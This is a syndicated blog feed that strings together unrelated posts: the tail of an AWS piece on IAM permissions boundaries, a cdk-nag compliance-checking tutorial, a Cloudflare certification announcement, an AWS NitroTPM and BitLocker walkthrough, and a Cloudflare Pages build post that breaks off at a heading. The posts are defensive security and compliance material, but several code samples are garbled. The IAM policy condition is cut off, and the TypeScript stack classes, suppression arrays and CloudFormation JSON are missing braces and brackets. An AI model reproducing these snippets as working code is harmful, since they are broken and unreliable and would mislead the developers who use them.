You might consider restricting your developers by directly applying permissions boundaries to them, but this presents the risk of you running out of policy space. Permissions boundaries use a managed IAM policy to restrict access, so permissions boundaries can only be up to 6,144 characters long. You can have up to 10 managed policies and 1 permissions boundary attached to an IAM role. Developers often need larger policy spaces because they perform so many functions. However, the individual roles that developers create—such as a role for an AWS service to access other AWS services, or a role for an application to interact with AWS resources—don’t need those same broad permissions. Therefore, it is generally a best practice to apply permissions boundaries to the IAM roles created by developers, rather than to the developers themselves.

There are better mechanisms to restrict developers, and we recommend that you use IAM identity policies and AWS Organizations service control policies (SCPs) to restrict access. In particular, the Organizations SCPs are a better solution here because they can restrict every principal in the account through one policy, rather than separately restricting individual principals, as permissions boundaries and IAM identity policies are confined to do.

You should also avoid replicating the developer policy space to a permissions boundary for a downstream IAM role. This, too, can cause you to run out of policy space. IAM roles that developers create have specific functions, and the permissions boundary can be tailored to common business functions to preserve policy space. Therefore, you can begin to group your permissions boundaries into categories that fit the scope of similar application functions or use cases (such as system automation and analytics), and allow your developers to choose from multiple options for permissions boundaries, as shown in the following policy sample.

"Condition": {
   "StringEquals": { 
      "iam:PermissionsBoundary": [

Finally, it is important to understand the differences between the various IAM resources available. The following table lists these IAM resources, their primary use cases and managing entities, and when they apply. Even if your organization uses different titles to refer to the personas in the table, you should have separation of duties defined as part of your security strategy.

IAM resource Purpose Owner/maintainer Applies to
Federated roles and policies Grant permissions to federated users for experimentation in lower environments Central team People represented by users in the enterprise identity provider
IAM workload roles and policies Grant permissions to resources used by applications, services Developer IAM roles representing specific tasks performed by applications
Permissions boundaries Limit permissions available to workload roles and policies Central team Workload roles and policies created by developers
IAM users and policies Allowed only by exception when there is no alternative that satisfies the use case Central team plus senior leadership approval Break-glass access; legacy workloads unable to use IAM roles


This blog post covered how you can use IAM permissions boundaries to allow your developers to create the roles that they need and to define the maximum permissions that can be given to the roles that they create. Remember, you can use AWS Organizations SCPs or deny statements in identity policies for scenarios where permissions boundaries are not appropriate. As your organization grows and you need to create and manage more roles, you can use permissions boundaries and follow AWS best practices to set security guard rails and decentralize role creation and management. Get started using permissions boundaries in IAM.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

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Umair Rehmat

Umair Rehmat

Umair is a cloud solutions architect and technologist based out of the Seattle WA area working on greenfield cloud migrations, solutions delivery, and any-scale cloud deployments. Umair specializes in telecommunications and security, and helps customers onboard, as well as grow, on AWS.

Manage application security and compliance with the AWS Cloud Development Kit and cdk-nag

Post Syndicated from Rodney Bozo original https://aws.amazon.com/blogs/devops/manage-application-security-and-compliance-with-the-aws-cloud-development-kit-and-cdk-nag/

Infrastructure as Code (IaC) is an important part of Cloud Applications. Developers rely on various Static Application Security Testing (SAST) tools to identify security/compliance issues and mitigate these issues early on, before releasing their applications to production. Additionally, SAST tools often provide reporting mechanisms that can help developers verify compliance during security reviews.

cdk-nag integrates directly into AWS Cloud Development Kit (AWS CDK) applications to provide identification and reporting mechanisms similar to SAST tooling.

This post demonstrates how to integrate cdk-nag into an AWS CDK application to provide continual feedback and help align your applications with best practices.

Overview of cdk-nag

cdk-nag (inspired by cfn_nag) validates that the state of constructs within a given scope comply with a given set of rules. Additionally, cdk-nag provides a rule suppression and compliance reporting system. cdk-nag validates constructs by extending AWS CDK Aspects. If you’re interested in learning more about the AWS CDK Aspect system, then you should check out this post.

cdk-nag includes several rule sets (NagPacks) to validate your application against. As of this post, cdk-nag includes the AWS Solutions, HIPAA Security, NIST 800-53 rev 4, NIST 800-53 rev 5, and PCI DSS 3.2.1 NagPacks. You can pick and choose different NagPacks and apply as many as you wish to a given scope.

cdk-nag rules can either be warnings or errors. Both warnings and errors will be displayed in the console and compliance reports. Only unsuppressed errors will prevent applications from deploying with the cdk deploy command.

You can see which rules are implemented in each of the NagPacks in the Rules Documentation in the GitHub repository.


This walkthrough will setup a minimal AWS CDK v2 application, as well as demonstrate how to apply a NagPack to the application, how to suppress rules, and how to view a report of the findings. Although cdk-nag has support for Python, TypeScript, Java, and .NET AWS CDK applications, we’ll use TypeScript for this walkthrough.


For this walkthrough, you should have the following prerequisites:

  • A local installation of and experience using the AWS CDK.

Create a baseline AWS CDK application

In this section you will create and synthesize a small AWS CDK v2 application with an Amazon Simple Storage Service (Amazon S3) bucket. If you are unfamiliar with using the AWS CDK, then learn how to install and setup the AWS CDK by looking at their open source GitHub repository.

  1. Run the following commands to create the AWS CDK application:
mkdir CdkTest
cd CdkTest
cdk init app --language typescript
  1. Replace the contents of the lib/cdk_test-stack.ts with the following:
import { Stack, StackProps } from 'aws-cdk-lib';
import { Construct } from 'constructs';
import { Bucket } from 'aws-cdk-lib/aws-s3';

export class CdkTestStack extends Stack {
  constructor(scope: Construct, id: string, props?: StackProps) {
    super(scope, id, props);
    const bucket = new Bucket(this, 'Bucket')
  1. Run the following commands to install dependencies and synthesize our sample app:
npm install
npx cdk synth

You should see an AWS CloudFormation template with an S3 bucket both in your terminal and in cdk.out/CdkTestStack.template.json.

Apply a NagPack in your application

In this section, you’ll install cdk-nag, include the AwsSolutions NagPack in your application, and view the results.

  1. Run the following command to install cdk-nag:
npm install cdk-nag
  1. Replace the contents of the bin/cdk_test.ts with the following:
#!/usr/bin/env node
import 'source-map-support/register';
import * as cdk from 'aws-cdk-lib';
import { CdkTestStack } from '../lib/cdk_test-stack';
import { AwsSolutionsChecks } from 'cdk-nag'
import { Aspects } from 'aws-cdk-lib';

const app = new cdk.App();
// Add the cdk-nag AwsSolutions Pack with extra verbose logging enabled.
Aspects.of(app).add(new AwsSolutionsChecks({ verbose: true }))
new CdkTestStack(app, 'CdkTestStack', {});
  1. Run the following command to view the output and generate the compliance report:
npx cdk synth

The output should look similar to the following (Note: SSE stands for Server-side encryption):

[Error at /CdkTestStack/Bucket/Resource] AwsSolutions-S1: The S3 Bucket has server access logs disabled. The bucket should have server access logging enabled to provide detailed records for the requests that are made to the bucket.

[Error at /CdkTestStack/Bucket/Resource] AwsSolutions-S2: The S3 Bucket does not have public access restricted and blocked. The bucket should have public access restricted and blocked to prevent unauthorized access.

[Error at /CdkTestStack/Bucket/Resource] AwsSolutions-S3: The S3 Bucket does not default encryption enabled. The bucket should minimally have SSE enabled to help protect data-at-rest.

[Error at /CdkTestStack/Bucket/Resource] AwsSolutions-S10: The S3 Bucket does not require requests to use SSL. You can use HTTPS (TLS) to help prevent potential attackers from eavesdropping on or manipulating network traffic using person-in-the-middle or similar attacks. You should allow only encrypted connections over HTTPS (TLS) using the aws:SecureTransport condition on Amazon S3 bucket policies.

Found errors

Note that applying the AwsSolutions NagPack to the application rendered several errors in the console (AwsSolutions-S1, AwsSolutions-S2, AwsSolutions-S3, and AwsSolutions-S10). Furthermore, the cdk.out/AwsSolutions-CdkTestStack-NagReport.csv contains the errors as well:

Rule ID,Resource ID,Compliance,Exception Reason,Rule Level,Rule Info
"AwsSolutions-S1","CdkTestStack/Bucket/Resource","Non-Compliant","N/A","Error","The S3 Bucket has server access logs disabled."
"AwsSolutions-S2","CdkTestStack/Bucket/Resource","Non-Compliant","N/A","Error","The S3 Bucket does not have public access restricted and blocked."
"AwsSolutions-S3","CdkTestStack/Bucket/Resource","Non-Compliant","N/A","Error","The S3 Bucket does not default encryption enabled."
"AwsSolutions-S5","CdkTestStack/Bucket/Resource","Compliant","N/A","Error","The S3 static website bucket either has an open world bucket policy or does not use a CloudFront Origin Access Identity (OAI) in the bucket policy for limited getObject and/or putObject permissions."
"AwsSolutions-S10","CdkTestStack/Bucket/Resource","Non-Compliant","N/A","Error","The S3 Bucket does not require requests to use SSL."

Remediating and suppressing errors

In this section, you’ll remediate the AwsSolutions-S10 error, suppress the  AwsSolutions-S1 error on a Stack level, suppress the  AwsSolutions-S2 error on a Resource level errors, and not remediate the  AwsSolutions-S3 error and view the results.

  1. Replace the contents of the lib/cdk_test-stack.ts with the following:
import { Stack, StackProps } from 'aws-cdk-lib';
import { Construct } from 'constructs';
import { Bucket } from 'aws-cdk-lib/aws-s3';
import { NagSuppressions } from 'cdk-nag'

export class CdkTestStack extends Stack {
  constructor(scope: Construct, id: string, props?: StackProps) {
    super(scope, id, props);
    // The local scope 'this' is the Stack. 
    NagSuppressions.addStackSuppressions(this, [
        id: 'AwsSolutions-S1',
        reason: 'Demonstrate a stack level suppression.'
    // Remediating AwsSolutions-S10 by enforcing SSL on the bucket.
    const bucket = new Bucket(this, 'Bucket', { enforceSSL: true })
    NagSuppressions.addResourceSuppressions(bucket, [
        id: 'AwsSolutions-S2',
        reason: 'Demonstrate a resource level suppression.'
  1. Run the cdk synth command again:
npx cdk synth

The output should look similar to the following:

[Error at /CdkTestStack/Bucket/Resource] AwsSolutions-S3: The S3 Bucket does not default encryption enabled. The bucket should minimally have SSE enabled to help protect data-at-rest.

Found errors

The cdk.out/AwsSolutions-CdkTestStack-NagReport.csv contains more details about rule compliance, non-compliance, and suppressions.

Rule ID,Resource ID,Compliance,Exception Reason,Rule Level,Rule Info
"AwsSolutions-S1","CdkTestStack/Bucket/Resource","Suppressed","Demonstrate a stack level suppression.","Error","The S3 Bucket has server access logs disabled."
"AwsSolutions-S2","CdkTestStack/Bucket/Resource","Suppressed","Demonstrate a resource level suppression.","Error","The S3 Bucket does not have public access restricted and blocked."
"AwsSolutions-S3","CdkTestStack/Bucket/Resource","Non-Compliant","N/A","Error","The S3 Bucket does not default encryption enabled."
"AwsSolutions-S5","CdkTestStack/Bucket/Resource","Compliant","N/A","Error","The S3 static website bucket either has an open world bucket policy or does not use a CloudFront Origin Access Identity (OAI) in the bucket policy for limited getObject and/or putObject permissions."
"AwsSolutions-S10","CdkTestStack/Bucket/Resource","Compliant","N/A","Error","The S3 Bucket does not require requests to use SSL."

Moreover, note that the resultant cdk.out/CdkTestStack.template.json template contains the cdk-nag suppression data. This provides transparency with what rules weren’t applied to an application, as the suppression data is included in the resources.

  "Metadata": {
    "cdk_nag": {
      "rules_to_suppress": [
          "id": "AwsSolutions-S1",
          "reason": "Demonstrate a stack level suppression."
  "Resources": {
    "BucketDEB6E181": {
      "Type": "AWS::S3::Bucket",
      "UpdateReplacePolicy": "Retain",
      "DeletionPolicy": "Retain",
      "Metadata": {
        "aws:cdk:path": "CdkTestStack/Bucket/Resource",
        "cdk_nag": {
          "rules_to_suppress": [
              "id": "AwsSolutions-S2",
              "reason": "Demonstrate a resource level suppression."

Reflecting on the Walkthrough

In this section, you learned how to apply a NagPack to your application, remediate/suppress warnings and errors, and review the compliance reports. The reporting and suppression systems provide mechanisms for the development and security teams within organizations to work together to identify and mitigate potential security/compliance issues. Security can choose which NagPacks developers should apply to their applications. Then, developers can use the feedback to quickly remediate issues. Security can use the reports to validate compliances. Furthermore, developers and security can work together to use suppressions to transparently document exceptions to rules that they’ve decided not to follow.

Advanced usage and further reading

This section briefly covers some advanced options for using cdk-nag.

Unit Testing with the AWS CDK Assertions Library

The Annotations submodule of the AWS CDK assertions library lets you check for cdk-nag warnings and errors without AWS credentials by integrating a NagPack into your application unit tests. Read this post for further information about the AWS CDK assertions module. The following is an example of using assertions with a TypeScript AWS CDK application and Jest for unit testing.

import { Annotations, Match } from 'aws-cdk-lib/assertions';
import { App, Aspects, Stack } from 'aws-cdk-lib';
import { AwsSolutionsChecks } from 'cdk-nag';
import { CdkTestStack } from '../lib/cdk_test-stack';

describe('cdk-nag AwsSolutions Pack', () => {
  let stack: Stack;
  let app: App;
  // In this case we can use beforeAll() over beforeEach() since our tests 
  // do not modify the state of the application 
  beforeAll(() => {
    // GIVEN
    app = new App();
    stack = new CdkTestStack(app, 'test');

    // WHEN
    Aspects.of(stack).add(new AwsSolutionsChecks());

  // THEN
  test('No unsuppressed Warnings', () => {
    const warnings = Annotations.fromStack(stack).findWarning(

  test('No unsuppressed Errors', () => {
    const errors = Annotations.fromStack(stack).findError(

Additionally, many testing frameworks include watch functionality. This is a background process that reruns all of the tests when files in your project have changed for fast feedback. For example, when using the AWS CDK in JavaScript/Typescript, you can use the Jest CLI watch commands. When Jest watch detects a file change, it attempts to run unit tests related to the changed file. This can be used to automatically run cdk-nag-related tests when making changes to your AWS CDK application.

CDK Watch

When developing in non-production environments, consider using AWS CDK Watch with a NagPack for fast feedback. AWS CDK Watch attempts to synthesize and then deploy changes whenever you save changes to your files. Aspects are run during synthesis. Therefore, any NagPacks applied to your application will also run on save. As in the walkthrough, all of the unsuppressed errors will prevent deployments, all of the messages will be output to the console, and all of the compliance reports will be generated. Read this post for further information about AWS CDK Watch.


In this post, you learned how to use cdk-nag in your AWS CDK applications. To learn more about using cdk-nag in your applications, check out the README in the GitHub Repository. If you would like to learn how to create your own rules and NagPacks, then check out the developer documentation. The repository is open source and welcomes community contributions and feedback.


Arun Donti

Arun Donti is a Senior Software Engineer with Twitch. He loves working on building automated processes and tools that enable builders and organizations to focus on and deliver their mission critical needs. You can find him on GitHub.

Cloudflare achieves key cloud computing certifications — and there’s more to come

Post Syndicated from Rory Malone original https://blog.cloudflare.com/iso-27018-second-privacy-certification-and-c5/

Cloudflare achieves key cloud computing certifications — and there’s more to come

Cloudflare achieves key cloud computing certifications — and there’s more to come

Back in the early days of the Internet, you could physically see the hardware where your data was stored. You knew where your data was and what kind of locks and security protections you had in place. Fast-forward a few decades, and data is all “in the cloud”. Now, you have to trust that your cloud services provider is putting security precautions in place just as you would have if your data was still sitting on your hardware. The good news is, you don’t have to merely trust your provider anymore. There are a number of ways a cloud services provider can prove it has robust privacy and security protections in place.

Today, we are excited to announce that Cloudflare has taken three major steps forward in proving the security and privacy protections we provide to customers of our cloud services: we achieved a key cloud services certification, ISO/IEC 27018:2019; we completed our independent audit and received our Cloud Computing Compliance Criteria Catalog (“C5”) attestation; and we have joined the EU Cloud Code of Conduct General Assembly to help increase the impact of the trusted cloud ecosystem and encourage more organizations to adopt GDPR-compliant cloud services.

Cloudflare has been committed to data privacy and security since our founding, and it is important to us that we can demonstrate these commitments. Certification provides assurance to our customers that a third party has independently verified that Cloudflare meets the requirements set out in the standard.

ISO/IEC 27018:2019 – Cloud Services Certification

2022 has been a big year for people who like the number ‘two’. February marked the second when the 22nd Feb 2022 20:22:02 passed: the second second of the twenty-second minute of the twentieth hour of the twenty-second day of the second month, of the year twenty-twenty-two! As well as the date being a palindrome — something that reads the same forwards and backwards — on an vintage ‘80s LCD clock, the date and time could be written as an ambigram too — something that can be read upside down as well as the right way up:

Cloudflare achieves key cloud computing certifications — and there’s more to come

When we hit 2022 02 22, our team was busy completing our second annual audit to certify to ISO/IEC 27701:2019, having been one of the first organizations in our industry to have achieved this new ISO privacy certification in 2021, and the first Internet performance & security company to be certified to it. And now Cloudflare has now been certified to a second international privacy standard related to the processing of personal data — ISO/IEC 27018:2019.1

ISO 27018 is a privacy extension to the widespread industry standards ISO/IEC 27001 and ISO/IEC 27002, which describe how to establish and run an Information Security Management System. ISO 27018 extends the standards into a code of practice for how any personal information should be protected when processed in a public cloud, such as Cloudflare’s.

What does ISO 27018 mean for Cloudflare customers?

Put simply, with Cloudflare’s certifications to both ISO 27701 and ISO 27018, customers can be assured that Cloudflare both has a privacy program that meets GDPR-aligned industry standards and also that Cloudflare protects the personal data processed in our network as part of that privacy program.

These certifications, in addition to the Data Processing Addendum (“DPA”) we make available to our customers, offer our customers multiple layers of assurance that any personal data that Cloudflare processes on their behalf will be handled in a way that meets the GDPR’s requirements.

The ISO 271018 standard contains enhancements to existing ISO 27002 controls and an additional set of 25 controls identified for organizations that are personal data processors. Controls are essentially a set of best practices that processors must meet in terms of data handling practices and transparency about those practices, protecting and encrypting the personal data processed, and handling data subject rights, among others. As an example, one of the ISO 27018 requirements is:

Where the organization is contracted to process personal data, that personal data may not be used for the purpose of marketing and advertising without establishing that prior consent was obtained from the appropriate data subject. Such consent shall not be a condition for receiving the service.

When Cloudflare acts as a data processor for our customers’ data, that data (and any personal data it may contain) belongs to our customers, not to us. Cloudflare does not track our customers’ end users for marketing or advertising purposes, and we never will. We even went beyond what the ISO control required and added this commitment to our customer DPA:

“… Cloudflare shall not use the Personal Data for the purposes of marketing or advertising…”
– 3.1(b), Cloudflare Data Protection Addendum

Cloudflare achieves ISO 27018:2019 Certification

For ISO 27018, Cloudflare was assessed by a third-party auditor, Schellman, between December 2021 and February 2022. Certifying to an ISO privacy standard is a multi-step process that includes an internal and an external audit, before finally being certified against the standard by the independent auditor. Cloudflare’s new single joint certificate, covering ISO 27001:2013, ISO 27018:2019, and ISO 27701:2019 is now available to download from the Cloudflare Dashboard.

Cloudflare achieves key cloud computing certifications — and there’s more to come

C5:2020 – Cloud Computing Compliance Criteria Catalog

ISO 27108 isn’t all we’re announcing: as we blogged in February, Cloudflare has also been undergoing a separate independent audit for the Cloud Computing Compliance Criteria Catalog certification — also known as C5 — which was introduced by the German government’s Federal Office for Information Security (“BSI”) in 2016 and updated in 2020. C5 evaluates an organization’s security program against a standard of robust cloud security controls. Both German government agencies and private companies place a high level of importance on aligning their cloud computing requirements with these standards. Learn more about C5 here.

Today, we’re excited to announce that we have completed our independent audit and received our C5 attestation from our third-party auditors. The C5 attestation report is now available  to download from the Cloudflare Dashboard.

And we’re not done yet…

When the European Union’s benchmark-setting General Data Protection Regulation (“GDPR”) was adopted four years ago this week, Article 40 encouraged:

“…the drawing up of codes of conduct intended to contribute to the proper application of this Regulation, taking account of the specific features of the various processing sectors and the specific needs of micro, small and medium-sized enterprises.”

The first code officially approved as GDPR-compliant by the EU one year ago this past weekend is ‘The EU Cloud Code of Conduct’. This code is designed to help cloud service providers demonstrate the protections they provide for the personal data they process on behalf of their customers. It covers all cloud service layers, and its compliance is overseen by accredited monitoring body SCOPE Europe. Initially, cloud service providers join as members of the code’s General Assembly, and then the second step is to undergo an audit to validate their adherence to the code.

Today, we are pleased to announce today that Cloudflare has joined the General Assembly of the EU Cloud Code of Conduct. We look forward to the second stage in this process, undertaking our audit and publicly affirming our compliance to the GDPR as a processor of personal data.

Cloudflare Certifications

Customers may now download a copy of Cloudflare’s certifications and reports from the Cloudflare Dashboard; new customers may request these from your sales representative. For the latest information about our certifications and reports, please visit our Trust Hub.

1The International Organization for Standardization (“ISO”) is an international, nongovernmental organization made up of national standards bodies that develops and publishes a wide range of proprietary, industrial, and commercial standards.

Amazon EC2 Now Supports NitroTPM and UEFI Secure Boot

Post Syndicated from Sébastien Stormacq original https://aws.amazon.com/blogs/aws/amazon-ec2-now-supports-nitrotpm-and-uefi-secure-boot/

In computing, Trusted Platform Module (TPM) technology is designed to provide hardware-based, security-related functions. A TPM chip is a secure crypto-processor that is designed to carry out cryptographic operations. There are three key advantages of using TPM technology. First, you can generate, store, and control access to encryption keys outside of the operating system. Second, you can use a TPM module to perform platform device authentication by using the TPM’s unique RSA key, which is burned into it. And third, it may help to ensure platform integrity by taking and storing security measurements.

During re:Invent 2021, we announced the future availability of NitroTPM, a virtual TPM 2.0-compliant TPM module for your Amazon Elastic Compute Cloud (Amazon EC2) instances, based on AWS Nitro System. We also announced Unified Extensible Firmware Interface (UEFI) Secure Boot availability for EC2.

I am happy to announce you can start to use both NitroTPM and Secure Boot today in all AWS Regions outside of China, including the AWS GovCloud (US) Regions.

You can use NitroTPM to store secrets, such as disk encryption keys or SSH keys, outside of the EC2 instance memory, protecting them from applications running on the instance. NitroTPM leverages the isolation and security properties of the Nitro System to ensure only the instance can access these secrets. It provides the same functions as a physical or discrete TPM. NitroTPM follows the ISO TPM 2.0 specification, allowing you to migrate existing on-premises workloads that leverage TPMs to EC2.

The availability of NitroTPM unlocks a couple of use cases to strengthen the security posture of your EC2 instances, such as secured key storage and access for OS-level volume encryption or platform attestation for measured boot or identity access.

Secured Key Storage and Access
NitroTPM can create and store keys that are wrapped and tied to certain platform measurements (known as Platform Configuration Registers – PCR). NitroTPM unwraps the key only when those platform measurements have the same value as they had at the moment the key was created. This process is referred to as “sealing the key to the TPM.” Decrypting the key is called unsealing. NitroTPM only unseals keys when the instance and the OS are in a known good state. Operating systems compliant with TPM 2.0 specifications use this mechanism to securely unseal volume encryption keys. You can use NitroTPM to store encryption keys for BitLocker on Microsoft Windows. Linux Unified Key Setup (LUKS) or dm-verity on Linux are examples of OS-level applications that can leverage NitroTPM too.

Platform Attestation
Another key feature that NitroTPM provides is “measured boot” a process where the bootloader and operating system extend PCRs with measurements of the software or configuration that they load during the boot process. This improves security in the event that, for example, a malicious program overwrites part of your kernel with malware. With measured boot, you can also obtain signed PCR values from the TPM and use them to prove to remote servers that the boot state is valid, enabling remote attestation support.

How to Use NitroTPM
There are three prerequisites to start using NitroTPM:

  • You must use an operating system that has Command Response Buffer (CRB) drivers for TPM 2.0, such as recent versions of Windows or Linux. We tested the following OSes: Red Hat Enterprise Linux 8, SUSE Linux Enterprise Server 15, Ubuntu 18.04, Ubuntu 20.04, and Windows Server 2016, 2019, and 2022.
  • You must deploy it on a Nitro-based EC2 instance. At the moment, we support all Intel and AMD instance types that support UEFI boot mode. Graviton1, Graviton2, Xen-based, Mac, and bare-metal instances are not supported.
  • Note that NitroTPM does not work today with some additional instance types, but support for these instance types will come soon after the launch. The list is: C6a, C6i, G4ad, G4dn, G5, Hpc6a, I4i, M6a, M6i, P3dn, R6i, T3, T3a, U-12tb1, U-3tb1, U-6tb1, U-9tb1, X2idn, X2iedn, and X2iezn.
  • When you create your own AMI, it must be flagged to use UEFI as boot mode and NitroTPM. Windows AMIs provided by AWS are flagged by default. Linux-based AMI are not flagged by default; you must create your own.

How to Create an AMI with TPM Enabled
AWS provides AMIs for multiple versions of Windows with TPM enabled. I can verify if an AMI supports NitroTPM using the DescribeImagesAPI call. For example:

aws ec2 describe-images --image-ids ami-0123456789

When NitroTPM is enabled for the AMI, “TpmSupport”: “v2.0” appears in the output, such as in the following example.

   "Images": [
         "BootMode": "uefi",
         "TpmSupport": "v2.0"

I may also query for tpmSupport using the DescribeImageAttribute API call.

When creating my own AMI, I may enable TPM support using the RegisterImage API call, by setting boot-mode to uefi and tpm-support to v2.0.

aws ec2 register-image             \
       --region us-east-1           \
       --name my-image              \
       --boot-mode uefi             \
       --architecture x86_64        \
       --root-device-name /dev/xvda \
       --block-device-mappings DeviceName=/dev/xvda,Ebs={SnapshotId=snap-0123456789example} DeviceName=/dev/xvdf,Ebs={VolumeSize=10} \
       --tpm-support v2.0

Now that you know how to create an AMI with TPM enabled, let’s create a Windows instance and configure BitLocker to encrypt the root volume.

A Walk Through: Using NitroTPM with BitLocker
BitLocker automatically detects and uses NitroTPM when available. There is no extra configuration step beyond what you do today to install and configure BitLocker. Upon installation, BitLocker recognizes the TPM module and starts to use it automatically.

Let’s go through the installation steps. I start the instance as usual, using an AMI that has both uefi and TPM v2.0 enabled. I make sure I use a supported version of Windows. Here I am using Windows Server 2022 04.13.

Once connected to the instance, I verify that Windows recognizes the TPM module. To do so, I launch the tpm.msc application, and the Trusted Platform Module (TPM) Management window opens. When everything goes well, it shows Manufacturer Name: AMZN under TPM Manufacturer Information.

Trusted Platform Module ManagementNext, I install BitLocker.

I open the servermanager.exe application and select Manage at the top right of the screen. In the dropdown menu, I select Add Roles and Features.

Add roles and featuresI select Role-based or feature-based installation from the wizard.

Install BitLocker - Step 1I select Next multiple times until I reach the Features section. I select BitLocker Drive Encryption, and I select Install.

Install BitLocker - Step 2I wait a bit for the installation and then restart the server at the end of the installation.

After reboot, I reconnect to the server and open the control panel. I select BitLocker Drive Encryption under the System and Security section.

Turn on Bitlocker - part 1I select Turn on BitLocker, and then I select Next and wait for the verification of the system and the time it takes to encrypt my volume’s data.

Just for extra safety, I decide to reboot at the end of the encryption. It is not strictly necessary. But I encrypted the root volume of the machine (C:) so I am wondering if the machine can still boot.

After the reboot, I reconnect to the instance, and I verify the encryption status.

Turn on Bitlocker - part 2I also verify BitLocker’s status and key protection method enabled on the volume. To do so, I open PowerShell and type

manage-bde -protectors -get C:

Bitlocker statusI can see on the resulting screen that the C: volume encryption key is coming from the NitroTPM module and the instance used Secure Boot for integrity validation. I can also view the recovery key.

I left the recovery key in plain text in the previous screenshot because the instance and volume I used for this demo will not exist anymore by the time you will read this. Do not share your recovery keys publicly otherwise.

Important Considerations
Now that I have shown how to use NitroTPM to protect BitLocker’s volume encryption key, I’ll go through a couple of additional considerations:

  • You can only enable an AMI for NitroTPM support by using the RegisterImage API via the AWS CLI and not via the Amazon EC2 console.
  • NitroTPM support is enabled by setting a flag on an AMI. After you launch an instance with the AMI, you can’t modify the attributes on the instance. The ModifyInstanceAttribute API is not supported on running or stopped instances.
  • Importing or exporting EC2 instances with NitroTPM, such as with the ImportImage API, will omit NitroTPM data.
  • The NitroTPM state is not included in EBS snapshots. You can only restore an EBS snapshot to the same EC2 instance.
  • BitLocker volumes that are encrypted with TPM-based keys cannot be restored on a different instance. It is possible to change the instance type (stop, change instance type, and restart it).

At the moment, we support all Intel and AMD instance types that supports UEFI boot mode. Graviton1, Graviton2, Xen-based, Mac, and bare-metal instances are not supported. Some additional instance types are not supported at launch (I shared the exact list previously). We will add support for these soon after launch.

There is no additional cost for using NitroTPM. It is available today in all AWS Regions, including the AWS GovCloud (US) Regions, except in China.

And now, go build 😉

— seb

A new era for Cloudflare Pages builds

Post Syndicated from Nevi Shah original https://blog.cloudflare.com/cloudflare-pages-build-improvements/

A new era for Cloudflare Pages builds

A new era for Cloudflare Pages builds

Music is flowing through your headphones. Your hands are flying across the keyboard. You’re stringing together a masterpiece of code. The momentum is building up as you put on the finishing touches of your project. And at last, it’s ready for the world to see. Heart pounding with excitement and the feeling of victory, you push changes to the main branch…. only to end up waiting for the build to execute each step and spit out the build logs.

Starting afresh

Since the launch of Cloudflare Pages, there is no doubt that the build experience has been its biggest source of criticism. From the amount of waiting to inflexibility of CI workflow, Pages had a lot of opportunity for growth and improvement. With Pages, our North Star has always been designing a developer platform that fits right into your workflow and oozes simplicity. User pain points have been and always will be our priority, which is why today we are thrilled to share a list of exciting updates to our build times, logs and settings!

Over the last three quarters, we implemented a new build infrastructure that speeds up Pages builds, so you can iterate quickly and efficiently. In February, we soft released the Pages Fast Builds Beta, allowing you to opt in to this new infrastructure on a per-project basis. This not only allowed us to test our implementation, but also gave our community the opportunity to try it out and give us direct feedback in Discord. Today we are excited to announce the new build infrastructure is now generally available and automatically enabled for all existing and new projects!

Faster build times

As a developer, your time is extremely valuable, and we realize Pages builds were slow. It was obvious that creating an infrastructure that built projects faster and smarter was one of our top requirements.

Looking at a Pages build, there are four main steps: (1) initializing the build environment, (2) cloning your git repository, (3) building the application, and (4) deploying to Cloudflare’s global network. Each of these steps is a crucial part of the build process, and upon investigating areas suitable for optimization, we directed our efforts to cutting down on build initialization time.

In our old infrastructure, every time a build job was submitted, we created a new virtual machine to run that build, costing our users precious dev time. In our new infrastructure, we start jobs on machines that are ready and waiting to be used, taking a major chunk of time away from the build initialization step. This step previously ran for 2+ minutes, but with our new infrastructure update, projects are expected to see a build initialization time cut down to 2-3 SECONDS.

This means less time waiting and more time iterating on your code.

Fast and secure

In our old build infrastructure, because we spun up a new virtual machine (VM) for every build, it would take several minutes to boot up and initialize with the Pages build image needed to execute the build. Alternatively, one could reuse a collection of VMs, assigning a new build to the next available VM, but containers share a kernel with the host operating system, making them far less isolated, posing a huge security risk. This could allow a malicious actor to perform a “container escape” to break out of their sandbox. We wanted the best of both worlds: the speed of a container with the isolation of a virtual machine.

Enter gVisor, a container sandboxing technology that drastically limits the attack surface of a host. In the new infrastructure, each container running with gVisor is given its own independent application “kernel,” instead of directly sharing the kernel with its host. Then, to address the speed, we keep a cluster of virtual machines warm and ready to execute builds so that when a new Pages deployment is triggered, it takes just a few seconds for a new gVisor container to start up and begin executing meaningful work in a secure sandbox with near native performance.

Stream your build logs

After we solidified a fast and secure build, we wanted to enhance the user facing build experience. Because a build may not be successful every time, providing you with the tools you need to debug and access that information as fast as possible is crucial. While we have a long list of future improvements for a better logging experience, today we are starting by enabling you to stream your build logs.

Prior to today, with the aforementioned build steps required to complete a Pages build, you were required to wait until the build completed in order to view the resulting build logs. Easily addressable issues like incorrectly inputting the build command or specifying an environment variable would have required waiting for the entire build to finish before understanding the problem.

Today, we’re giving you the power to understand your build issues as soon as they happen. Spend less time waiting for your logs and start debugging the events of your builds within a second or less after they happen!

Control Branch Builds

Finally, the build experience does not just include the events during execution but everything leading up to the trigger of a build. For our final trick, we’re enabling our users to have full control of the precise branches they’d like to include and exclude for automatic deployments.

Before today, Pages submitted builds for every commit in both production and preview environments, which led to queued builds and even more waiting if you exceeded your concurrent build limit. We wanted to provide even more flexibility to control your CI workflow. Now you can configure your build settings to specify branches to build, as well as skip ad hoc commits.

Specify branches to build

While “unlimited staging” is one of Pages’ greatest advantages, depending on your setup, sometimes automatic deployments to the preview environment can cause extra noise.

In the Pages build configuration setting, you can specify automatic deployments to be turned off for the production environment, the preview environment, or specific preview branches. In a more extreme case, you can even pause all deployments so that any commit sent to your git source will not trigger a new Pages build.

Additionally, in your project’s settings, you can now configure the specific Preview branches you would like to include and exclude for automatic deployments. To make this configuration an even more powerful tool, you can use wildcard syntax to set rules for existing branches as well as any newly created preview branches.

A new era for Cloudflare Pages builds

Read more in our Pages docs on how to get started with configuring automatic deployments with Wildcard Syntax.

Using CI Skip

Sometimes commits need to be skipped on an ad hoc basis. A small update to copy or a set of changes within a small timespan don’t always require an entire site rebuild. That’s why we also implemented a CI Skip command for your commit message, signaling to Pages that the update should be skipped by our builder.

With both CI Skip and configured build rules, you can keep track of your site changes in Pages’ deployment history.

A new era for Cloudflare Pages builds

Where we’re going

We’re extremely excited to bring these updates to you today, but of course, this is only the beginning of improving our build experience. Over the next few quarters, we will be bringing more to the build experience to create a seamless developer journey from site inception to launch.

Incremental builds and caching

